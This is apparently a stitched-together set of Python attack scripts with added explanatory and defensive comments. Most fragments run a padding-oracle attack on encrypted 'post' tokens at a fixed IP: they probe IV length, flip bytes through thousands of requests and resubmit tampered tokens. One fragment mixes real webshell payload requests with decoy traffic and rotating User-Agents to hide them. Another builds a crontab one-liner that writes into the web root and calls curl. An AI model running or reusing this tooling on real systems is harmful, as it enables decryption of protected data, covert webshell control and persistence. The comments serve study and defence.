def decript_data(url, hash):
    """Submit one ciphertext to the ``post`` endpoint and parse the reply.

    ``hash`` is encoded with ``common.b64e`` and placed in the ``post``
    query parameter of ``url``.  Redirects are not followed, so the body
    examined below is the endpoint's own answer.

    Returns:
        Whatever ``extract_data`` (defined outside this block) produces
        from the response body.

    Raises:
        Exception: with the message ``'error de padding'`` when the body
            contains the text ``'PaddingException'``.

    Security note: the two outcomes can only be told apart because the
    server echoes its decryption error to the client.  An endpoint that
    verifies ciphertext integrity before decrypting (AEAD or
    encrypt-then-MAC) and answers every failure with the same generic
    response gives the caller nothing to distinguish.
    """
    encoded = common.b64e(hash)
    response = requests.get(f'{url}?post={encoded}', allow_redirects=False)
    body = response.text
    if 'PaddingException' in body:
        raise Exception('error de padding')
    return extract_data(body)
def prepare(self):
    """Fill ``self.ammunitions`` with a randomised batch of request descriptors.

    Between 6 and 18 descriptors are built.  Each one is a dict with the
    keys ``data``, ``headers`` (a single ``User-Agent`` drawn from
    ``USER_AGENTS``), ``name`` and ``rsa``:

    * index equal to ``_real``: ``name`` is ``self.shell`` and ``data`` is
      ``self.payload``, wrapped as ``{self.passwd: self.payload}`` when a
      password is set; ``rsa`` is 1.
    * any other even index: ``data`` is a dict with an MD5 value under
      ``'p'`` and ``self.random_data()`` under ``'c'``; ``rsa`` stays 0.
    * any other odd index: ``data`` is ``b64e(self.random_bytes())``;
      ``rsa`` is 1.

    For the last two cases ``name`` is either ``self.random_shell_name()``
    or ``self.shell``, chosen by a coin flip.

    NOTE(review): ``_real`` is drawn from 1..18 independently of ``_num``,
    so index 0 is never the payload entry and a batch with
    ``_num <= _real`` contains filler only.
    NOTE(review): what ``rsa`` means to the consumer is not visible here;
    presumably it selects how ``data`` is encoded before sending. Confirm.

    Detection note: filler and payload entries are mixed on purpose, so
    log review should treat the whole burst as one event. Once these
    descriptors are sent (the sending code is outside this method) that
    is 6 to 18 requests whose User-Agent is re-drawn per request, some of
    them addressed to ``self.shell``.
    """
    self.ammunitions = []
    # Batch size and the index reserved for the payload entry.
    _num = random.randint(6, 18)
    _real = random.randint(1, 18)
    logger.info("[+] Mix Flow Number : %d" % _num)
    for i in range(_num):
        rsa = 0
        # Coin flip: random name or the configured one.
        if random.choice([1, 0]):
            shell_name = self.random_shell_name()
        else:
            shell_name = self.shell
        if _real == i:
            # attack traffic
            shell_name = self.shell
            if self.passwd:
                data = {self.passwd: self.payload}
            else:
                data = self.payload
            rsa = 1
            logger.debug("[#] Real Attack %s" % shell_name)
        elif i % 2 == 0:
            # Filler, form-style body: MD5 of one of 51 integers plus random text.
            data = {
                'p': md5(str(random.randint(1000000, 1000050))),
                'c': self.random_data()
            }
        else:
            # Filler, opaque body: encoded random bytes.
            data = b64e(self.random_bytes())
            rsa = 1
        # The User-Agent is re-drawn for every descriptor.
        headers = {"User-Agent": random.choice(USER_AGENTS)}
        self.ammunitions.append({
            "data": data,
            "headers": headers,
            "name": shell_name,
            "rsa": rsa
        })
def random_data(self, target="", path="/var/www/html/"):
    """Return one filler string for a request body.

    A number ``k`` in 1..12 and an entry of ``KEYWORDS`` are drawn first.
    When ``k > 3`` the result is the text of a shell one-liner that would
    install a crontab entry, built from ``path``, ``target`` and two
    random names.  Otherwise the ``KEYWORDS`` entry is returned unchanged.

    This method only formats and returns the string; nothing here
    executes it.

    NOTE(review): the two ``elif`` arms test ``k > 6`` and ``k > 9`` after
    ``k > 3`` has already matched, so they never run.  In practice the
    output is the crontab text for 9 of the 12 values of ``k`` and a bare
    keyword for the other 3.

    Detection note: a request body that contains a ``| crontab`` pipeline
    writing under the web root is worth alerting on, whether the request
    turns out to be filler or not.
    """
    k = random.randint(1, 12)
    keyworkd = random.choice(KEYWORDS)
    if k > 3:
        name = self.random_shell_name()
        # Placeholders, in order: temp-file name, path, name, target, name.
        keyworkd = "echo '*/1 * * * * /bin/cat /tmp/{} > {}{};/usr/bin/curl \"{}{}\"' | crontab".format(
            self.random_str(), path, name, target, name)
    elif k > 6:
        # Unreachable: k > 6 implies k > 3, which is handled above.
        keyworkd = (b64e(keyworkd) * random.randint(3, 5))
    elif k > 9:
        # Unreachable for the same reason; also a no-op assignment.
        keyworkd = keyworkd
    return keyworkd
import base64
import binascii

import common

# Dump hash.bin in three renderings so they can be compared side by side:
# hex, standard Base64, and the project's own common.b64e encoding
# (common is defined outside this file).
with open('hash.bin', 'rb') as handle:
    hash_ = handle.read()

print(binascii.hexlify(hash_))
print(base64.b64encode(hash_))
print(common.b64e(hash_))
# Byte-by-byte probe of a ciphertext against a server that reports padding
# failures.  hash_, common and utils are defined outside this fragment.
#
# Defensive reading: the loop below can issue up to 15 * 256 = 3840 requests,
# and the only signal it uses is whether the reply contains
# 'PaddingException' or 'Error'.  A server that authenticates the ciphertext
# before decrypting and returns one generic failure response removes that
# signal; a long run of decryption failures for a single resource is also a
# clear alerting condition.

# Decode the token and keep a mutable copy of its bytes.
dhash = common.b64d(hash_)
lhash = list(dhash)
tamano = len(dhash)
print('hash:')
utils.print_hash(dhash)
# Window under test: starts 33 bytes before the end and stops 16 bytes before
# the end, i.e. 17 bytes, with the final 16 bytes left untouched.
inicio = tamano - ((16 * 2) + 1)
fin = tamano - 16
lblock = lhash[inicio:fin]
# Maps window index -> first byte value the server accepted at that index.
solucion = {}
# Indexes 15 down to 1 are varied; index 0 and index 16 are never changed.
for h in range(15, 0, -1):
    for i in range(0, 256):
        lblock[h] = i
        # Rebuild the full token with the modified window spliced back in.
        rhash = lhash[:inicio] + lblock + lhash[fin:]
        bhash = bytes(rhash)
        shash = common.b64e(bhash)
        print(f'{h},{i}')
        # utils.test_hash presumably submits the token and returns the
        # response text; confirm against utils.
        text = utils.test_hash(shash)
        if 'PaddingException' not in text and 'Error' not in text:
            utils.print_hash(bhash)
            print(text)
            print(i)
            solucion[h] = i
            print(solucion)
            # lblock[h] keeps the accepted value for the following positions.
            break
print(solucion)
# Create a post, pull the returned token out of the page, resubmit a modified
# token and print what the server says.  title, body, rhash (a compiled
# pattern), common, binascii and sys are defined outside this fragment.
#
# Defensive reading: if a server returns anything other than a generic
# rejection for a token whose bytes were removed or rearranged, the token has
# no integrity protection.  Authenticating the ciphertext (AEAD or
# encrypt-then-MAC) makes every modified token fail identically.

# Both requests go through an intercepting proxy on 127.0.0.1:8080 and do not
# follow redirects.
p = requests.post("http://35.227.24.107/51980f8ea3/", data={
    'title': title,
    'body': body
}, proxies={'http': 'http://127.0.0.1:8080'}, allow_redirects=False)
# p.ok is true for any status below 400, so a 3xx reply passes this check.
if not p.ok:
    print('error generando hash : ')
    print(p.text)
    print(p.status_code)
    sys.exit(1)
html = p.text
m = rhash.search(html)
if not m:
    print('algo salió mal extrayendo el hash')
    sys.exit(1)
# First capture group of the pattern is the encoded token.
hash_ = m.group(1)
print(hash_)
dhash = common.b64d(hash_)
# NOTE(review): dhash[16:0] is always an empty slice, so nhash is exactly the
# first 16 bytes of dhash.
nhash = dhash[16:0] + dhash[:16]
print(binascii.hexlify(dhash))
print(binascii.hexlify(nhash))
# Re-encode the modified bytes and send them back as the ``post`` parameter.
hash_ = common.b64e(nhash)
print(hash_)
r = requests.get(f'http://35.227.24.107/51980f8ea3/?post={hash_}', proxies={'http': 'http://127.0.0.1:8080'}, allow_redirects=False)
print(r.text)
import requests

import common
import utils

# Length probe: submit 0..99 zero bytes as the ``post`` token and record the
# lengths for which the reply contains 'IV must be 16 bytes long'.
#
# Defensive reading: that message comes from the server's crypto layer.
# Returning it to the client reveals how the token is parsed; a generic error
# page with the detail kept in server-side logs reveals nothing.
url = 'http://35.227.24.107/b6b38fea92/'
registers = []

for length in range(100):
    zeros = bytes(length)
    try:
        ehash = common.b64e(zeros)
        reply = requests.get(
            f'{url}?post={ehash}',
            proxies={'http': 'http://127.0.0.1:8080'},
            allow_redirects=False,
        )
        if 'IV must be 16 bytes long' in reply.text:
            registers.append(length)
    except Exception:
        # Best effort, as in the original: any failure for this length
        # (encoding or network) is ignored and the length is not recorded.
        pass

print(registers)
import binascii
import sys

import common

# Usage: pass the path of a binary file as the first argument.  The file's
# bytes are printed as hex and as the UTF-8 bytes of common.b64e's output
# (common is defined outside this file).
source_path = sys.argv[1]
with open(source_path, 'rb') as handle:
    hash_ = handle.read()

print(binascii.hexlify(hash_))
print(common.b64e(hash_).encode('utf8'))